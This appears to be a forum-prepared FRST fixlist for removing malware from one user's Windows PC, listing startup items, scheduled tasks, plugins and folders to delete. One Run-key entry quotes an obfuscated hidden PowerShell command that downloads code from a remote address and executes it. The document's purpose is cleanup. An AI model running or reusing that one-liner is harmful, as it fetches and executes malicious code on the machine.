How to use this fixlist Download as fixlist.txt (or copy and save manually as fixlist.txt - not fixlist.txt.txt)same folder as FRST.exe / FRST64.exeSave all open work and close all applications - FRST may close running programs and unsaved work will be lostFix Fixlog.txt back in the thread
Warning: Only run a fixlist prepared specifically for your system. Running someone else's fixlist will not work effectively even if you have similiar infection symptoms and may cause removal of legitimate entries or even system damage.
Copy to clipboard
Download as fixlist.txt
Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
Startup: C:\Users\lhblackwood\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\com_app_watch.lnk [2026-03-14] <==== ATTENTION
C:\Users\lhblackwood\Downloads\Free Files Downloaded
HKU\S-1-5-21-427736139-3086332084-3035502372-1001\...\Run: [Windows PowerShell v1.0] => powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 powershell.exe; .(gal ?rm) 45.10245905/load | .('ROGieROGx'.Replace('ROG', ''))" (No File) <==== ATTENTION
Task: {35CD1908-A9DE-405D-A397-01344C7070DA} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (No File)
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (No File)
Task: {0BB36A32-0D9E-4297-AFD7-6BD7B5DB4C9B} - System32\Tasks\Microsoft\Windows\UNP\RunUpdateNotificationMgr => %windir%\System32\UNP\UpdateNotificationMgr.exe (No File)
Task: {CBE2BCF0-FB3F-4793-BCC5-0AE5473A2EBC} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\MusUx_LogonUpdateResults => %systemroot%\system32\MusNotification.exe LogonUpdateResults (No File)
Task: {A4BB3C42-AE2B-4DB9-A6F8-D1067EBF9D22} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (No File)
Task: {3E6360D1-2F7A-4668-B77C-3C8BFAC91DF4} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
Task: {5B38F688-4413-43B7-9513-07EC5AC2F1FA} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB" (No File)
Task: {BCDB474C-E933-42C9-98C3-E7045D79EE5A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe (No File)
Task: {A629E733-BD1C-4B81-9262-B7A40BF83DD9} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe (No File)
Task: {1D64FC7F-B3AF-4709-9840-67683DE3E750} - System32\Tasks\Opera scheduled Autoupdate 1627270141 => C:\Users\annaj\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (No File)
FF Plugin: @java.com/DTPlugin,version=11.291.2 -> C:\Program Files\Java\jre1.8.0_291\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin: @java.com/JavaPlugin,version=11.291.2 -> C:\Program Files\Java\jre1.8.0_291\bin\plugin2\npjp2.dll [No File]
FF Plugin: @wanmei.com/npArcPlayNowPlugin -> [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]
2026-03-14 02:58 - 2026-03-14 02:58 - 000000000 ____D C:\ProgramData\Beki
2026-03-14 02:54 - 2026-03-14 02:54 - 001234160 _____ (AOMEI Tech Co., Ltd.) C:\Users\lhblackwood\GigaVe.exe
2026-03-14 02:53 - 2026-03-14 02:53 - 000000000 ____D C:\Users\lhblackwood\AppData\Roaming\win_upload_proc_net35
2026-03-14 02:53 - 2026-03-14 02:53 - 000000000 ____D C:\ProgramData\win_upload_proc_net35
EmptyTemp:
End::